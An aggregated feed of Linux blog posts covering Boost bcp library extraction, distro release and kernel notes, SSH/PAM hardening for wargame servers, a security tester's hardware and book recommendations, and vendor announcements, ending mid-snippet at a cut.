While Boost header-only libraries are not generally split in standard packaging systems, the bcp tool is provided to allow users to extract a subset of the entire Boost distribution into a user-specified location. As far as I know, the tool scans header files for #include directives (ignoring ifdefs, like a packager would) and gathers together all of the transitively required files. That means that these diagrams are a good measure of how much stuff the bcp tool will extract.

Note also that these edges do not contribute time to your slow build – reducing edges in the graphs by moving files won’t make anything faster. Rewriting the implementation of certain things might, but that is not what we are talking about here.

I can run the tool to generate a usable Boost.ICL which I can easily distribute. I delete the docs, examples and tests from the ICL directory because they make up a large chunk of the size. Such a ‘subset distribution’ doesn’t need any of those. I also remove 3.5M of preprocessed files from MPL. I then need to define BOOST_MPL_CFG_NO_PREPROCESSED_HEADERS when compiling, which is easy and explained at the end:

$ bcp --boost=$HOME/dev/src/boost icl myicl
$ rm -rf myicl/libs/icl/{doc,test,example}
$ rm -rf myicl/boost/mpl/aux_/preprocessed
$ du -hs myicl/
15M     myicl/

Ok, so it’s pretty big. Looking at the dependency diagram for Boost.ICL you can see an arrow to the ‘incidental spirit’ module. Looking at the Boost.Spirit dependency diagram you can see that it is quite large.

Why does ICL depend on ‘incidental spirit’? Can that dependency be removed?

For those ‘incidental modules’, I selected one of the repositories within the group and named the group after that one repository. To see why ICL depends on ‘incidental spirit’, we have to examine all 5 of the repositories in the group to check which one is responsible for the dependency edge.

boost/libs/icl$ git grep -Pl -e include --and \
  -e "thread|spirit|pool|serial|date_time" include/
include/boost/icl/gregorian.hpp
include/boost/icl/ptime.hpp

Formatting wide terminal output is tricky in a blog post, so I had to make some compromises in the output here. Those ICL headers are including Boost.DateTime headers.

I can further see that gregorian.hpp and ptime.hpp are ‘leaf’ files in this analysis. Other files in ICL do not include them.

boost/libs/icl$ git grep -l gregorian include/
include/boost/icl/gregorian.hpp
boost/libs/icl$ git grep -l ptime include/
include/boost/icl/ptime.hpp

As it happens, my ICL-using code also does not need those files. I’m only using icl::interval_set<double> and icl::interval_map<double>. So, I can simply delete those files.

boost/libs/icl$ git grep -l -e include \
  --and -e date_time include/boost/icl/ | xargs rm
boost/libs/icl$

and run the bcp tool again.

$ bcp --boost=$HOME/dev/src/boost icl myicl
$ rm -rf myicl/libs/icl/{doc,test,example}
$ rm -rf myicl/boost/mpl/aux_/preprocessed
$ du -hs myicl/
12M     myicl/

I’ve saved 3M just by understanding the dependencies a bit. Not bad!

The size difference is mostly accounted for by no longer extracting boost::mpl::vector, and secondly by the Boost.DateTime headers themselves.

The dependencies in the graph are now so few that we can consider them and wonder why they are there and whether they can be removed. For example, there is a dependency on the Boost.Container repository. Why is that?

include/boost/icl$ git grep -C2 -e include \
   --and -e boost/container
#if defined(ICL_USE_BOOST_MOVE_IMPLEMENTATION)
#   include <boost/container/set.hpp>
#elif defined(ICL_USE_STD_IMPLEMENTATION)
#   include <set>
--

#if defined(ICL_USE_BOOST_MOVE_IMPLEMENTATION)
#   include <boost/container/map.hpp>
#   include <boost/container/set.hpp>
#elif defined(ICL_USE_STD_IMPLEMENTATION)
#   include <map>
--

#if defined(ICL_USE_BOOST_MOVE_IMPLEMENTATION)
#   include <boost/container/set.hpp>
#elif defined(ICL_USE_STD_IMPLEMENTATION)
#   include <set>

So, Boost.Container is only included if the user defines ICL_USE_BOOST_MOVE_IMPLEMENTATION, and otherwise not. If we were talking about C++ code here we might consider this a violation of the Interface Segregation Principle, but we are not, and unfortunately the realities of the preprocessor mean this kind of thing is quite common.

I know that I’m not defining that and I don’t need Boost.Container, so I can hack the code to remove those includes, eg:

index 6f3c851..cf22b91 100644
--- a/include/boost/icl/map.hpp
+++ b/include/boost/icl/map.hpp
@@ -12,12 +12,4 @@ Copyright (c) 2007-2011:
 
-#if defined(ICL_USE_BOOST_MOVE_IMPLEMENTATION)
-#   include <boost/container/map.hpp>
-#   include <boost/container/set.hpp>
-#elif defined(ICL_USE_STD_IMPLEMENTATION)
 #   include <map>
 #   include <set>
-#else // Default for implementing containers
-#   include <map>
-#   include <set>
-#endif

This and following steps don’t affect the filesystem size of the result. However, we can continue to analyze the dependency graph.

I can break apart the ‘incidental fusion’ module by deleting the iterator/zip_iterator.hpp file, removing further dependencies in my custom Boost.ICL distribution. I can also delete the iterator/function_input_iterator.hpp file to remove the dependency on Boost.FunctionTypes. The result is a graph which you can at least reason about being used in an interval tree library like Boost.ICL, quite apart from our starting point with that library.

You might shudder at the thought of deleting zip_iterator if it is an essential tool to you. Partly I want to explore in this blog post what will be needed from Boost in the future when we have zip views from the Ranges TS or use the existing ranges-v3 directly, for example. In that context, zip_iterator can go.

Another feature of the bcp tool is that it can scan a set of source files and copy only the Boost headers that are included transitively. If I had used that, I wouldn’t need to delete the ptime.hpp or gregorian.hpp etc because bcp wouldn’t find them in the first place. It would still find the Boost.Container etc includes which appear in the ICL repository however.

In this blog post, I showed an alternative approach to the bcp --scan attempt at minimalism. My attempt is to use bcp to export useful and as-complete-as-possible libraries. I don’t have a lot of experience with bcp, but it seems that in scanning mode I would have to re-run the tool any time I used an ICL header which I had not used before. With the modular approach, it would be less-frequently necessary to run the tool (only when directly using a Boost repository I hadn’t used before), so it seemed an approach worth exploring the limitations of.

Examining Proposed Standard Libraries

We can also examine other Boost repositories, particularly those which are being standardized by newer C++ standards because we know that any, variant and filesystem can be implemented with only standard C++ features and without Boost.

Looking at Boost.Variant, it seems that use of the Boost.Math library makes that graph much larger. If we want Boost.Variant without all of that Math stuff, one thing we can choose to do is copy the one math function that Variant uses, static_lcm, into the Variant library (or somewhere like Boost.Core or Boost.Integer for example). That does cause a significant reduction in the dependency graph.

Further, I can remove the hash_variant.hpp file to remove the Boost.Functional dependency:

I don’t know if C++ standardized variant has similar hashing functionality or how it is implemented, but it is interesting to me how it affects the graph.

Using a bcp-extracted library with Modern CMake

After extracting a library or set of libraries with bcp, you might want to use the code in a CMake project. Here is the modern way to do that:

add_library(boost_mpl INTERFACE)
target_compile_definitions(boost_mpl INTERFACE
    BOOST_MPL_CFG_NO_PREPROCESSED_HEADERS
)
target_include_directories(boost_mpl INTERFACE 
    "${CMAKE_CURRENT_SOURCE_DIR}/myicl"
)

add_library(boost_icl INTERFACE)
target_link_libraries(boost_icl INTERFACE boost_mpl)
target_include_directories(boost_icl INTERFACE 
    "${CMAKE_CURRENT_SOURCE_DIR}/myicl/libs/icl/include"
)
add_library(boost::icl ALIAS boost_icl)

Boost ships a large chunk of preprocessed headers for various compilers, which I mentioned above. The reasons for that are probably historical and obsolete, but they will remain and they are used by default when using GCC and that will not change. To diverge from that default it is necessary to set the BOOST_MPL_CFG_NO_PREPROCESSED_HEADERS preprocessor macro.

By defining an INTERFACE boost_mpl library and setting its INTERFACE target_compile_definitions, any user of that library gets that magic BOOST_MPL_CFG_NO_PREPROCESSED_HEADERS define when compiling its sources.

MPL is just an internal implementation detail of ICL though, so I won’t have any of my CMake targets using MPL directly. Instead I additionally define a boost_icl INTERFACE library which specifies an INTERFACE dependency on boost_mpl with target_link_libraries.

The last ‘modern’ step is to define an ALIAS library. The alias name is boost::icl and it aliases the boost_icl library. To CMake, the following two commands generate an equivalent buildsystem:

target_link_libraries(myexe boost_icl)
target_link_libraries(myexe boost::icl)

Using the ALIAS version has a different effect however: If the boost::icl target does not exist an error will be issued at CMake time. That is not the case with the boost_icl version. It makes sense to use target_link_libraries with targets with :: in the name and ALIAS makes that possible for any library.


21 August, 2016 08:48PM

Cesar Sevilla: Problems with Revolution Slider (Abort Class-pclzip.php : Missing Zlib)

If you like using WordPress and run into this little issue (Abort Class-pclzip.php : Missing Zlib) while importing a slider with Revolution Slider, don’t worry; the solution is as follows:

  1. Edit the file located inside the wp-admin/includes/ folder: sudo nano /folder-where-your-site-lives/wp-admin/includes/class-pclzip.php
  2. Find the line if (!function_exists(‘gzopen’)) and replace gzopen with gzopen64.

With that small change you can keep using the plugin without any problem.

Now, why does this error occur? In recent Ubuntu releases, gzopen (the PHP function that lets us open a .gz-compressed file) is only included for the 64-bit architecture, which is why it is necessary to replace gzopen with gzopen64 so that we can import all those files compressed in this format.
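The manual edit from step 2 can also be scripted with sed; a hedged sketch that operates on a throwaway copy of the relevant lines (the file content here is illustrative):

```shell
# Stand-in for the relevant lines of class-pclzip.php (illustrative content).
mkdir -p demo-wp/wp-admin/includes
cat > demo-wp/wp-admin/includes/class-pclzip.php <<'EOF'
if (!function_exists('gzopen')) { die('Abort Class-pclzip.php : Missing Zlib'); }
$v_file = gzopen($p_archive, 'rb');
EOF

# Replace every whole-word gzopen with gzopen64 (GNU sed).
sed -i 's/\bgzopen\b/gzopen64/g' demo-wp/wp-admin/includes/class-pclzip.php
grep -c gzopen64 demo-wp/wp-admin/includes/class-pclzip.php   # prints 2
```

Back up the real file before applying this to a live WordPress install.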

Happy Hacking!


21 August, 2016 05:37PM

hackergotchi for SparkyLinux

SparkyLinux

Login screen failed

 

Reported issue: the login screen (lightdm) doesn’t start after the first boot from a hard drive, after installing Sparky.

Possible reason: plymouth

To work around it temporarily, edit the kernel boot options via GRUB.
Press the ‘e’ key to edit them.

GRUB

Go to the end of the line starting with “linux” and delete the ‘quiet splash’ options.

GRUB

Then press the “F10” key to boot.
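To make the removal permanent once you can log in, a common Debian approach (an assumption here, not part of the original instructions) is to drop those options from GRUB_CMDLINE_LINUX_DEFAULT in /etc/default/grub and then run update-grub; sketched below on a demo copy of the relevant line:

```shell
# Demo copy of the relevant line (edit /etc/default/grub on a real system).
printf 'GRUB_CMDLINE_LINUX_DEFAULT="quiet splash"\n' > grub.demo
sed -i 's/quiet splash//' grub.demo
cat grub.demo   # prints: GRUB_CMDLINE_LINUX_DEFAULT=""
# On the real file, follow up with:  sudo update-grub
```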

It happens on some machines/some hardware.

Keep in mind that Sparky is based on and fully compatible with Debian ‘testing’, so situations like this sometimes happen.

If you are looking for a rock-stable operating system – choose Debian ‘stable’.

 

21 August, 2016 01:34PM by pavroo

hackergotchi for VyOS

VyOS

Commercial support and professional services for VyOS

From earlier posts, you may remember Sentrium S.L., an IT consulting company founded by one of the VyOS maintainers and two long time VyOS users and community members.
In this post I (Daniil Baturin, that is) speak as a Sentrium founder, so "we" refers to all Sentrium employees, not to all VyOS maintainers as usual.

Now Sentrium is ready to offer commercial support and professional services for VyOS.

We plan to use the funds towards the VyOS project in various ways, including hiring people for both short-term and long-term tasks like bugfixing and feature implementation, documentation improvements, VyOS events, building VyOS testing labs available to all contributors, development of training and certification programs, and much more.

Small businesses, educational institutions, and nonprofits may be eligible for discounts (subject to review, please contact us for details).

If you are interested, drop us an email to sales@sentrium.io or visit our website (http://www.sentrium.io/).

Commercial support

We offer two types of support plans at a fixed price:

  • Basic: email support only, response within two business days, 1500 eur/year
  • Standard: email support only, response within one business day, 5000 eur/year
To clarify: it’s not 1500 or 5000 eur for each router; it’s for the entire company (a single legal entity), no matter how many routers it uses.

VyOS support includes answering questions that you may have about VyOS, its installation and upgrade process, features and their usage, and so on. We can also review customer network diagrams and config files and suggest what features and protocols to use and what changes can be made to optimize performance and scalability.

If you find any bugs or have any feature requests, we will help you figure out the details and the reproduction procedure (in the case of a bug) and communicate it to VyOS developers. We also offer external monitoring and emergency security notifications as part of support plans.

Custom support plans with different terms, such as included phone support, shorter response times or 24/7 support, hands-on assistance, etc. are also available. Since everyone's needs are different and it's hard to devise a one-size-fits-all solution, the cost is negotiated on a case-by-case basis.

Professional Services

Professional services include VyOS installation, upgrade, migration from competing platforms, configuration according to requirements, troubleshooting and so on.

The base rate is 200 eur/hour, though depending on the complexity of the task and environment it may be lower or higher.

21 August, 2016 10:41AM by Yuriy Andamasov

hackergotchi for Ubuntu developers

Ubuntu developers

Valorie Zimmerman: Help a friend?

Hello, if you are reading this and have some extra money, consider helping out a young friend of mine whose mother needs a better defense attorney.

In India, where they live, the resources all seem stacked against her. I've tried to help, and hope you will too.

Himanshu says, Hi, I recently started an online crowd funding campaign to help my mother with legal funds who is in the middle of divorce and domestic violence case.

 https://www.ketto.org/mother

Please support and share this message. Thanks.

21 August, 2016 07:55AM by Valorie Zimmerman (noreply@blogger.com)

hackergotchi for Emmabuntüs Debian Edition

Emmabuntüs Debian Edition

With THOT for a 2.0 solidarity

In this world, each individual has access to the Internet and is digitally savvy enough to have a great influence on his or her social and economic environment. Each individual, fully aware of the ecological impact on our planet generated by 60 million tons of electronic waste yearly, should be able to clean and preserve that environment. We [...]

21 August, 2016 07:55AM by yves

hackergotchi for Ubuntu developers

Ubuntu developers

David Tomaschik: (Slightly) Securing Wargame Servers

I was setting up some wargame boxes for a private group and wanted to reduce the risk of malfeasance/abuse from these boxes. One option, used by many public wargames, is locking down the firewall. While that’s a great start, I decided to go one step further and prevent directly logging in as the wargame users, requiring that the users of my private wargames have their own accounts.

Step 1: Setup the Private Accounts

This is pretty straightforward: create a group for these users that can SSH directly in, create their accounts, and set up their public keys.

# groupadd sshusers
# useradd -G sshusers matir
# su - matir
$ mkdir -p .ssh
$ echo 'AAA...' > .ssh/authorized_keys

Step 2: Configure PAM

This will set up PAM to define who can log in from where. Edit /etc/security/access.conf to look like this:

# /etc/security/access.conf
+ : (sshusers) : ALL
+ : ALL : 127.0.0.0/24
- : ALL : ALL

This allows sshusers to log in from anywhere, and everyone to log in locally. This way, users allowed via SSH log in, then port forward from their machine to the wargame server to connect as a level.
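The forwarding step might look roughly like this – the hostname, port and level account name are placeholders:

```shell
# First hop: your own account (must be in sshusers); forward a local port
# to the wargame box's sshd, which sees the second login as coming from localhost.
ssh -L 2222:localhost:22 matir@wargames.example.com

# In another terminal: connect as a level through the tunnel.
ssh -p 2222 level1@localhost
```

With TCP forwarding left at its default of enabled, the second login arrives from 127.0.0.1 and so passes the access.conf rules above.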

Edit /etc/pam.d/sshd to use this by uncommenting (or adding) a line:

account  required     pam_access.so nodefgroup

Step 3: Configure SSHD

Now we’ll configure SSHD to allow access as needed: passwords locally, keys only from remote hosts, and make sure we use PAM. Ensure the following settings are set:

UsePAM yes

Match Address !127.0.0.0/24
  PasswordAuthentication no

Step 4: Test

Restart sshd and you should be able to connect remotely as any user in sshusers, but not any other user. You should also be able to port forward and then connect with a username/password through the forwarded port.

21 August, 2016 07:00AM

August 20, 2016

hackergotchi for SparkyLinux

SparkyLinux

Linux kernel 4.7.2

 

A very quick update of the latest stable version of Linux kernel 4.7.2 is available in Sparky “unstable” repository.

Make sure you have Sparky “unstable” repository http://sparkylinux.org/wiki/doku.php/repository active to upgrade or install the latest kernel.

Follow the Wiki page: http://sparkylinux.org/wiki/doku.php/linux_kernel to install the latest Sparky’s Linux kernel.

Then reboot your machine for the changes to take effect.

To quickly remove an older version of the Linux kernel, simply run the APTus-> Remove-> Uninstall Old Kernel script.

 

20 August, 2016 11:27PM by pavroo

SparkyLinux 4.4 is out

New, updated live/install iso images of SparkyLinux 4.4 “Tyche” are available to download now.

As before, the Sparky “Home” editions provide a fully featured operating system based on Debian ‘testing’, with desktops of your choice: LXDE, LXQt, KDE, MATE and Xfce.

Changes between versions 4.3 and 4.4:
– full system upgrade as of August 15, 2016
– Linux kernel 4.6.4 (4.7.1-sparky is available in Sparky repos, see howto)
– firefox 45.3.0.ESR (firefox 48 is available in Sparky repos)
– calamares is available (but not default yet) in our repos
– new default theme called ‘Numix-SX’
– added new desktops to MinimalISO and APTus: Lumina, Trinity and PekWM
– ‘tint2’ panel replaced by ‘fbpanel’ in the MinimalGUI iso images
– added ‘rootactions-servicemenu’ to the Dolphin file manager in the KDE edition
– added short key which runs a terminal emulator in the MinimalGUI edition (Super+t)
– added an option which lets you install a PDF viewer, to the ‘sparky-office’ tool
– Midori web browser replaced by NetSurf in the MinimalGUI edition
– the ‘sparky-firstrun’ which lets you fully upgrade the system and install missing language packages has been fixed
– the ‘sparkylinux-installer’ – a part of ‘sparky-backup-core’ tool refreshes package list itself and installs the latest desktop settings in the MinimalGUI and MinimalCLI editions
– added Vivaldi and NetSurf web browsers to Sparky repos
– improved Wiki pages

The Sparky Advanced Installer, which runs on the MinimalGUI or MinimalCLI iso images, lets you install the base system with a minimal set of applications and a desktop of your choice, such as: awesome, bspwm, Budgie, Cinnamon, Enlightenment, Fluxbox, GNOME Flashback, GNOME Shell, i3, IceWM, JWM, KDE Plasma 5, Lumina, LXDE, LXQt, MATE, Openbox, Pantheon, PekWM, Trinity, Window Maker, Xfce.

It also lets you choose a web browser to be installed: Chromium, Dillo, Epiphany, Firefox (esr or latest), Konqueror, Midori, NetSurf, QupZilla, SeaMonkey, TOR Browser, Vivaldi.

The installation of a desktop of your choice via the Advanced Installer is possible only if your network connection is on (online installation). Otherwise, the Advanced Installer installs the Live system as it is.

Read the MinimalISO how to http://sparkylinux.org/wiki/doku.php/minimal

ISO images of SparkyLinux can be downloaded from the download page:
http://sparkylinux.org/download

Sparky ISO images verification how to: http://sparkylinux.org/wiki/doku.php/verify_iso

Known issues: login screen failed, see how to fix it.

 

20 August, 2016 12:29PM by pavroo

LMDE

Linux Mint 18 “Sarah” KDE – BETA Release

This is the BETA release for Linux Mint 18 “Sarah” KDE Edition.

Linux Mint 18 Sarah KDE Edition

Linux Mint 18 is a long term support release which will be supported until 2021. It comes with updated software and brings refinements and many new features to make your desktop even more comfortable to use.

New features:

This new version of Linux Mint contains many improvements.

For an overview of the new features please visit:

“What’s new in Linux Mint 18 KDE”.

Important info:

The release notes provide important information about known issues, as well as explanations, workarounds and solutions.

To read the release notes, please visit:

Release Notes for Linux Mint 18 KDE

System requirements:

  • 2GB RAM.
  • 10GB of disk space (20GB recommended).
  • 1024×768 resolution (on lower resolutions, press ALT to drag windows with the mouse if they don’t fit in the screen).

Notes:

  • The 64-bit ISO can boot with BIOS or UEFI.
  • The 32-bit ISO can only boot with BIOS.
  • The 64-bit ISO is recommended for all modern computers (Almost all computers sold in the last 10 years are equipped with 64-bit processors).

Upgrade instructions:

  • This BETA release might contain critical bugs, please only use it for testing purposes and to help the Linux Mint team fix issues prior to the stable release.
  • It will be possible to upgrade from this BETA to the stable release.
  • It will not be possible to upgrade from Linux Mint 17.3 KDE (this edition uses Plasma 5 and this is considered a different desktop).

Bug reports:

  • Please report bugs below in the comment section of this blog.
  • When reporting bugs, please be as accurate as possible and include any information that might help developers reproduce the issue or understand the cause of the issue:
    • Bugs we can reproduce, or whose cause we understand, are usually fixed very easily.
    • It is important to mention whether a bug happens “always”, or “sometimes”, and what triggers it.
    • If a bug happens but didn’t happen before, or doesn’t happen in another distribution, or doesn’t happen in a different environment, please mention it and try to pinpoint the differences at play.
    • If we can’t reproduce a particular bug and we don’t understand its cause, it’s unlikely we’ll be able to fix it.
  • Please visit https://github.com/linuxmint/Roadmap to follow the progress of the development team between the BETA and the stable release.

Download links:

Here are the download links for the 64-bit ISO:

A 32-bit ISO image is also available at https://www.linuxmint.com/download_all.php.

Integrity and authenticity checks:

Once you have downloaded an image, please verify its integrity and authenticity.

Anyone can produce fake ISO images; it is your responsibility to check that you are downloading the official ones.

Enjoy!

We look forward to receiving your feedback. Many thanks in advance for testing the BETA!

20 August, 2016 09:49AM by Clem

hackergotchi for Ubuntu developers

Ubuntu developers

David Tomaschik: Matir's Favorite Things

One of my friends was recently asking me about some of the tools I use, particularly for security assessments. While I can’t give out all of these things for free Oprah-style, I did want to take a moment to share some of my favorite security- and technology-related tools, services and resources.

Hardware

Lenovo T450s My primary laptop is a Lenovo T450s. For me, it’s the perfect mix of weight and processing power – configured with enough RAM, the i5-5200U has no trouble running 2 or 3 VMs at the same time, and with an internal 3-cell battery plus a 6-cell battery pack, it will go all day without an outlet. (Though not necessarily under 100% CPU load.) Though Lenovo no longer sells this, having replaced it with the T460s, it’s still available on Amazon.

Startech The StarTech.com USB 3.0 dual gigabit ethernet interface allows one to perform ethernet bridging or routing across it, while still having the built-in interface to connect to the internet. If you don’t have a built-in interface, it still gives you two interfaces to play with. Each interface is an ASIX AX88179 chip, and you’ll also see a VIA Labs, Inc. Hub appear when you connect it, giving some idea of how the device is implemented: a USB 3.0 hub, plus two USB 3.0 to GigE PHY chips. I haven’t benchmarked the interface (maybe I will soon) but for the cases I’ve used it for – mostly a passive MITM to observe traffic on embedded devices – it’s been much more than sufficient.

WiFi Pineapple Nano The WiFi Pineapple Nano is probably best known for its Karma trickery to impersonate other wireless networks, but this dual radio device is so much more. You can use it to connect one radio to a network and the other to share out WiFi, so you only have to pay for one connected device. In fact, you can put OpenVPN on it when doing this, so all your traffic (even on devices that don’t support a VPN, like a Kindle) is encrypted across the network. (Use WPA2 with a good passphrase on the client side if you want to have some semblance of privacy there.)

LAN Turtle The LAN Turtle is essentially a miniature ARM computer with two network interfaces. One of those interfaces is connected to a USB-to-Ethernet adapter, resulting in the entire device looking like an oversized USB-to-Ethernet adapter. You can plug this inline to a computer via USB and have an active MITM on the network, all powered from the USB port it’s plugged into. This is a stealthy drop box for access on an assessment. (I haven’t tried, but I imagine you can power it from a wall-wart and just plug in the wired interface if all you need is a single network connection.) My biggest complaint about this device is that it, like all of the Hak5 hardware, is really not that open. I haven’t been able to build my own firmware for it, which I’d like to do, rather than just using the packages available in the default LAN Turtle firmware.

ALFA WiFi Adapter The ALFA AWUS036NH WiFi Adapter is the 802.11b/g/n version of the popular ALFA WiFi radios. It can go up to 2000 mW, but the legal limit in the USA is 1000 mW (30 dBm), and even at that power, you’re driving further than you can hear with most antennas. I like this package because it comes with a high-gain 7 dBi panel antenna and a suction cup mount, allowing you to place the adapter in the optimal position. Just in case that’s not enough, you can get a 13 dBi yagi to extend both your transmit and receive range even further. Great for demonstrating that a client can’t depend on physical distance to protect their wireless network.

Books

Oh man, I could go on for a while on books… I’m going to try to focus on just the highlights.

Stealing the Network There’s a number of books containing collections of anecdotes and stories that help to develop an attacker mindset, where you begin to think and understand as attackers do, preparing you to see things in a different light:

RTFM For Assessments, Penetration Testing, and other Offensive Security practices, there’s a huge variety of resources. While books do tend to become outdated quickly in this industry, the fundamentals don’t change that often, and it’s important to understand the fundamentals before moving on to the more advanced topics of discussion. While I strongly prefer eBooks (they’re lighter, go with me everywhere, and can be searched easily), one of my coworkers swears by the printed material – take your pick and do whatever works for you.

I’m not much of a blue teamer, so I’m hard pressed to suggest the “must have” books for that side of the house.

Services

I have to start with DigitalOcean. Not only is this blog hosted on one of their VPS, but I do a lot of my testing and research on their VPSs. Whenever I need a quick VM, I can spin one up there for under 1 cent per hour. I’ve had nearly perfect uptime (my own stupidity outweighs their outages at least 10 to 1) and on the rare occasion I’ve needed their support, it’s been absolutely first rate. DigitalOcean started off for developers, but they offer a great production-quality product for almost any use.

20 August, 2016 07:00AM

August 19, 2016

hackergotchi for SparkyLinux

SparkyLinux

EFL 1.18.0

 

There is an update of EFL 1.18.0 ready in Sparky repository now.

Due to changes by the Enlightenment developers, ‘evas-generic-loaders’, ‘emotion-generic-players’ and ‘elementary’ have been merged into the EFL package and are no longer available as separate packages in the Sparky repos.

Nothing changes about installing Enlightenment, so do it as before:
sudo apt-get update
sudo apt-get install enlightenment

To upgrade EFL and other Enlightenment’s tools, do:
sudo apt-get update
sudo apt-get dist-upgrade

The upgrade removes ‘evas-generic-loaders’, ‘emotion-generic-players’ and ‘elementary’ automatically, so no special attention from users is needed.

 

19 August, 2016 09:02PM by pavroo

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Insights: Cenique and Canonical partnering to create certified digital signage and audience measurement solutions

cenique-logo

Companies to provide plug and play digital signage and audience measurement solution based on Ubuntu Core.

London, UK – August 15, 2016 – Canonical today announced that it is entering into a partnership with Cenique to provide digital signage players that are certified for Ubuntu.

Cenique is an emerging leader in the Retail and Digital Out of Home (DOOH) industry, providing the DIY and SME markets with next-generation Intelligent Digital Signage and Audience Measurement Solutions. Cenique provides its customers with both standard and customized hardware and software solutions, creating a perfect fit for their signage and audience measurement deployment needs.

In their quest to continuously expand their breadth of capabilities, Cenique is turning to a platform that matches its current mode of operation of providing an a la carte menu of features for Retail and Digital Out of Home (DOOH) deployments. Ubuntu Core with its app store and software management functionality offers the range of add-on services they’re looking to support, like various Content Management Systems (CMS) applications, remote management and update capabilities. The company therefore looks to take advantage of the many options available on Ubuntu with an eye on providing its customers with the perfect solution for their application.

Furthermore, Cenique is also looking to adopt snap as a packaging format for their digital signage and audience measurement applications. Through snap, Cenique can simplify the installation of the applications for their customers, while increasing the security and stability of their solution.

“Digital Signage technologies are benefiting from the fast-paced innovation of IoT. The ‘display only’ digital signage player now needs to be able to do a lot more – count passers-by, offer wifi access, serve advertising based on time of day or weather conditions, offer interactive content, etc. Having Ubuntu certified players by Cenique means advertisers can benefit from the wealth of applications available on Ubuntu Core out of the box, and embrace this new era in Digital Signage,” said Thibaut Rouffineau, head of devices marketing at Canonical.

Shylesh Karuvath, Co-Founder & CEO, says: “Partnering with Canonical and their Ubuntu Core platform gives us the ability to expand from our current ARM based platform to multiple hardware platforms and IoT devices, opening new possibilities for Cenique. Ubuntu Core also enables us to be more focused on our Software Applications rather than on the OS and Distribution.”

About Canonical
Canonical is the company behind Ubuntu, the leading Operating System for cloud and the Internet of Things. Most public cloud workloads are running Ubuntu, and most new smart gateways, self-driving cars and advanced humanoid robots are running Ubuntu as well. Canonical provides enterprise support and services for commercial users of Ubuntu.

Canonical leads the development of the snap universal Linux packaging system for secure, transactional device updates and app stores. Ubuntu Core is an all-snap OS, perfect for devices and appliances. Established in 2004, Canonical is a privately held company.

About Cenique
An emerging leader in the Retail and Digital Out of Home (DOOH) industry, Cenique provides the DIY and SME markets with next-generation Intelligent Digital Signage and Audience Measurement Solutions. Cenique’s solutions are used by customers on most continents around the globe, ranging from brand owners, retail chains and advertising network operators to corporations, professional baseball and basketball teams, universities, and many more.

Cenique is headquartered in Hong Kong with offices in North America and distribution points around the world. Visit www.cenique.com to learn more about our products and how we can work with you and your industry.

19 August, 2016 08:48AM

August 18, 2016

Valorie Zimmerman: Weeeeee! Akademy and Qtcon approaching fast



Thanks to the Ubuntu Community Fund, I'm able to fly to Berlin and attend, and volunteer too. Thanks so much, Ubuntu community for backing me, and to the KDE e.V. and KDE community for creating and running Akademy.

This year, Akademy is part of Qtcon, which should be exciting. Lots of our friends will be there, from KDAB, VLC, Qt and FSFE. And of course Kubuntu will do our annual face-to-face meeting, with as many of us as can get to Berlin. It should be hot, exhausting, exciting, fun, and hard work, all rolled together in one of the world's great cities.

Today we got the news that Canonical has become a KDE e.V. Patron. This is most welcome news, as the better the cooperation between distributions and KDE, the better software we all have. This comes soon after SuSE's continuing support was affirmed on the growing list of Patrons.

Freedom and generosity is what it's all about!

18 August, 2016 11:17PM by Valorie Zimmerman (noreply@blogger.com)


Jonathan Riddell: Plasma Release Schedule Updated

I’ve made some changes to the Plasma 5.8 release schedule.  We had a request from our friends at openSUSE to bring the release sooner by a couple of weeks so they could sneak it into their release and everyone could enjoy the LTS goodness.  As openSUSE are long term supporters and contributors to KDE as well as patrons of KDE the Plasma team chatted and decided to slide the dates around to help out.  Release is now on the first Tuesday in October.

 


18 August, 2016 09:14PM

hackergotchi for SparkyLinux

SparkyLinux

Linux kernel 4.7.1

 

I have been busy the whole of last week fighting with the new Sparky iso images, but that is all done now, so I could build new kernel packages.

The latest stable version of Linux kernel 4.7.1 just landed in Sparky “unstable” repository.

Make sure you have the Sparky “unstable” repository http://sparkylinux.org/wiki/doku.php/repository active to upgrade to or install the latest kernel.
amd64:
sudo apt-get install linux-image-sparky-amd64
686 non-pae:
sudo apt-get install linux-image-sparky-686
686-pae:
sudo apt-get install linux-image-sparky-686-pae

Then reboot your machine for the changes to take effect.

To quickly remove an older version of the Linux kernel, simply run the APTus-> Remove-> Uninstall Old Kernel script.
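If you are unsure which of the three kernel flavours above fits your machine, the choice follows from the CPU architecture and PAE support. A small helper sketch (function name mine, for illustration only — not part of Sparky's tooling):

```shell
# Map machine architecture and PAE support to the matching Sparky
# kernel package name (helper name is mine, illustrative only).
pick_kernel_pkg() {
    arch="$1"; pae="$2"
    case "$arch" in
        x86_64) echo "linux-image-sparky-amd64" ;;
        i686)
            if [ "$pae" = "pae" ]; then
                echo "linux-image-sparky-686-pae"
            else
                echo "linux-image-sparky-686"
            fi ;;
        *) echo "unsupported arch: $arch" >&2; return 1 ;;
    esac
}

pick_kernel_pkg x86_64 nopae  # → linux-image-sparky-amd64
pick_kernel_pkg i686 pae      # → linux-image-sparky-686-pae
```

On a live system you would feed it `uname -m` and check for the `pae` flag in /proc/cpuinfo.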

 

18 August, 2016 07:30PM by pavroo

hackergotchi for Ubuntu developers

Ubuntu developers

Jonathan Riddell: Space Left at the (Non)Party Flat at Akademy/QtCon

Akademy is this year at QtCon along with FSF-E, Qt, VLC and others.

I booked a flat on AirBNB near to the Akademy location and there’s still a bed or two left available.

Wed Aug 31 CHECK IN 2:00 PM

Thu Sep 08 CHECK OUT 11:00 AM

Cost: £360 each, about €420 each

If you’d like to stay with cool KDE people in a (gentle) party flat send me an e-mail.




18 August, 2016 03:17PM

Jono Bacon: Opening Up Data Science with data.world

Earlier this year when I was in Austin, my friend Andy Sernovitz introduced me to a new startup called data.world.

What caught my interest is that they are building a platform to make data science and discovery easier, more accessible, and more collaborative. I love these kinds of big juicy challenges!

Recently I signed them up as a client to help them build their community, and I want to share a few words about why I think they are important, not just for data science fans, but from a wider scientific discovery perspective.

Screen Shot 2016-08-15 at 3.35.31 AM

Armchair Discovery

Data plays a critical role in the world. Buried in rows and rows of seemingly flat content are patterns, trends, and discoveries that can help us to learn, explore new ideas, and work more effectively.

The work that leads to these discoveries is often bringing together different data sets to explore and reach new conclusions. As an example, traffic accident data for a single town is interesting, but when we combine it with data sets for national/international traffic accidents, insurance claims, drink driving, and more, we can often find patterns that can help us to influence and encourage new behavior and technology.
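As a toy illustration of that kind of join (all numbers made up, plain Python): combining per-town accident counts with insurance claims yields a derived metric that neither dataset shows on its own.

```python
accidents = {"townA": 12, "townB": 30}  # accidents per town (hypothetical)
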